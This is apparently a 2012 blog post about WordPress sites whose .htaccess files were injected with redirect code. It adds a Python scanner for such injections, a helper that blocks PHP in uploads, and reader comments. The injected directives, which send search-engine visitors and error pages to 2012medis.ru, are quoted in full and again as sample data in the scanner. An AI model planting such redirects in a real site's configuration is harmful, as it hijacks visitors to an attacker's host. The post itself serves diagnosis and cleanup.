Wednesday, July 4, 2012

Sites Hacked? .htaccess files were code injected

(Previous Title: "Inmotion Hosting Hacked?")
At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule>
and
ErrorDocument 400 http://2012medis.ru/cocumber?4
ErrorDocument 401 http://2012medis.ru/cocumber?4
ErrorDocument 403 http://2012medis.ru/cocumber?4
ErrorDocument 404 http://2012medis.ru/cocumber?4
ErrorDocument 500 http://2012medis.ru/cocumber?4
I corrected the problem by removing the injected code from my existing files and deleting the ones that were added, which I identified quickly by their size of 1.57 KB (1,608 bytes).

-UPDATE-
It may be related to a file called ".cache_000.php" injected via a vulnerability in WordPress. Look in your /wp-content/uploads/ directory for .cache_000.php.
For me the file had the same timestamp as some of the .htaccess files did.

-UPDATE-
I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated WordPress.

-UPDATE-
Update WordPress or make the .cache_000.php file inaccessible.
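The two signatures described above (a referrer-conditioned RewriteRule that sends visitors to an external host, and ErrorDocument lines pointing at an absolute external URL) are easy to check for mechanically, as is the presence of .php files under wp-content/uploads. The scanner below is an added example, not the blog author's code: it embeds a constructed .htaccess built from a normal WordPress rule block with the post's injected lines appended, builds a throwaway document root with a placeholder file named like the .cache_000.php the post mentions, and reports what it finds. OWN_HOSTS is a placeholder for the site's own domains; the search-engine name list used for the cloaking check is an assumption taken from the quoted RewriteCond.

```python
"""Detect .htaccess redirect injection and PHP files in WordPress uploads.

Added example (not the blog author's code).  Reports three things:
  * RewriteRule targets on an external host (the post's rules 301 search
    and social referrals to http://2012medis.ru/...)
  * ErrorDocument targets that are absolute URLs on an external host
  * a RewriteCond on HTTP_REFERER listing many search engines (cloaking)
  * .php files under wp-content/uploads, where none belong
"""
import os
import re
import tempfile

# Placeholder: hosts that may legitimately appear in this site's redirects.
OWN_HOSTS = {"example.com", "www.example.com"}

REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
ERROR_DOC = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(\S+)", re.I)
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
ABS_URL = re.compile(r"^https?://([^/?#]+)", re.I)
# Assumed list, taken from the RewriteCond quoted in the post.
SEARCH_ENGINE_NAMES = ("google", "yahoo", "bing", "msn", "aol", "lycos",
                       "altavista", "ask", "facebook", "twitter")


def _external_host(target):
    """Host of an absolute URL that is not one of our own, else None."""
    m = ABS_URL.match(target)
    if not m:
        return None
    host = m.group(1).lower()
    return None if host in OWN_HOSTS else host


def scan_htaccess_text(text):
    """Return [(line_no, reason), ...] for one .htaccess body."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REWRITE_RULE.match(line)
        if m:
            host = _external_host(m.group(1))
            if host:
                findings.append((no, "RewriteRule redirects to external host " + host))
            continue
        m = ERROR_DOC.match(line)
        if m:
            host = _external_host(m.group(2))
            if host:
                findings.append((no, "ErrorDocument %s points to external host %s" % (m.group(1), host)))
            continue
        if REFERER_COND.match(line):
            low = line.lower()
            if sum(name in low for name in SEARCH_ENGINE_NAMES) >= 3:
                findings.append((no, "referrer condition on search engines (cloaking)"))
    return findings


def find_php_in_uploads(uploads_dir):
    """Relative paths of PHP-like files under an uploads tree (should be empty)."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".php5")):
                hits.append(os.path.relpath(os.path.join(root, name), uploads_dir))
    return sorted(hits)


def scan_site(docroot):
    """Scan every .htaccess under docroot and check wp-content/uploads."""
    report = {}
    for root, _dirs, files in os.walk(docroot):
        if ".htaccess" in files:
            path = os.path.join(root, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_htaccess_text(fh.read())
            if found:
                report[os.path.relpath(path, docroot)] = found
    uploads = os.path.join(docroot, "wp-content", "uploads")
    if os.path.isdir(uploads):
        for rel in find_php_in_uploads(uploads):
            report[os.path.join("wp-content", "uploads", rel)] = [(0, "PHP file inside uploads")]
    return report


# Constructed sample: the standard WordPress block plus the post's injected lines.
SAMPLE_INJECTED = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
ErrorDocument 404 /404.html
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule>
ErrorDocument 400 http://2012medis.ru/cocumber?4
ErrorDocument 404 http://2012medis.ru/cocumber?4
"""


def demo():
    """Build a throwaway docroot from the constructed sample and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, ".htaccess"), "w") as fh:
            fh.write(SAMPLE_INJECTED)
        month = os.path.join(tmp, "wp-content", "uploads", "2012", "07")
        os.makedirs(month)
        with open(os.path.join(month, "photo.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff")  # constructed image stub
        with open(os.path.join(month, ".cache_000.php"), "w") as fh:
            fh.write("<?php // constructed placeholder, not the real file\n")
        return scan_site(tmp)


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        for no, reason in findings:
            print("%s:%d: %s" % (path, no, reason))
```

Point scan_site at a real document root to check a live install; the benign WordPress rules and a relative ErrorDocument target such as /404.html produce no findings, only the appended block and the uploads file do.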

2 comments:

  1. I got hit by the same hack. The hackers screwed up and mis-spelled a URL (starting it with "htttp"!), which caused my whole WP site to lock up. I cleaned it all up (or so I thought); 24 hours later it was hacked again. Rinse, repeat, watch the logs... and this morning it was hacked again. This time I could identify the exact time of the hack, and checking the logs I saw the reference to the ".cache_000.php" file you mention.

    The obvious question is, how did the file get into my uploads directory? And how can I tell PHP not to execute anything from uploads?

    Replies
    1. Hey Geoff, sorry for the delay in responding... really your best option is to update WordPress. If you can't do that, you could make your .htaccess redirect requests to it. If you have access to change your file permissions, I think you could do 770 without breaking its legitimate use.

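The commenter's second question, how to stop PHP from executing anything under uploads, is usually answered with a .htaccess in that directory that denies requests for PHP-like filenames. The helper below is an added example, not the blog author's or WordPress's code: it appends such a block to wp-content/uploads/.htaccess without clobbering directives already there, is safe to run twice, and demonstrates itself on a constructed temporary directory. It assumes Apache 2.2 syntax (the Order/Deny form current in 2012; Apache 2.4 uses "Require all denied") and that the host's AllowOverride permits these directives.

```python
"""Deny direct requests for PHP files under wp-content/uploads.

Added example, not the blog author's or WordPress's code.  The FilesMatch /
Deny form is used rather than "php_flag engine off" because it works whether
PHP runs as mod_php or as CGI/FastCGI (php_flag in .htaccess fails with a
500 under the latter).
"""
import os
import tempfile

MARKER = "# BEGIN block-php-in-uploads"

# Apache 2.2 syntax; on 2.4 replace the Order/Deny lines with "Require all denied".
BLOCK_PHP = MARKER + """
<FilesMatch "\\.(php|phtml|php[0-9]|phps)$">
    Order Deny,Allow
    Deny from all
</FilesMatch>
# END block-php-in-uploads
"""


def php_execution_blocked(uploads_dir):
    """True if uploads/.htaccess already carries the deny block."""
    path = os.path.join(uploads_dir, ".htaccess")
    if not os.path.isfile(path):
        return False
    with open(path, encoding="utf-8", errors="replace") as fh:
        return MARKER in fh.read()


def harden_uploads(uploads_dir):
    """Append the deny block to uploads/.htaccess, keeping existing lines.

    Returns True if the file was written, False if the block was already present.
    """
    if php_execution_blocked(uploads_dir):
        return False
    path = os.path.join(uploads_dir, ".htaccess")
    existing = ""
    if os.path.isfile(path):
        with open(path, encoding="utf-8", errors="replace") as fh:
            existing = fh.read()
    if existing and not existing.endswith("\n"):
        existing += "\n"
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(existing + BLOCK_PHP)
    return True


def demo():
    """Run the hardening twice against a constructed uploads directory."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = os.path.join(tmp, "wp-content", "uploads")
        os.makedirs(uploads)
        # Constructed pre-existing directive that must survive untouched.
        with open(os.path.join(uploads, ".htaccess"), "w") as fh:
            fh.write("Options -Indexes")
        first = harden_uploads(uploads)
        second = harden_uploads(uploads)
        with open(os.path.join(uploads, ".htaccess")) as fh:
            return first, second, fh.read()


if __name__ == "__main__":
    written, again, content = demo()
    print("written:", written, "second run wrote:", again)
    print(content)
```

This is defence in depth rather than a fix: anything that can drop a file into uploads can also overwrite this .htaccess, so the directives belong in the server configuration where the host allows it, alongside the WordPress update the post recommends.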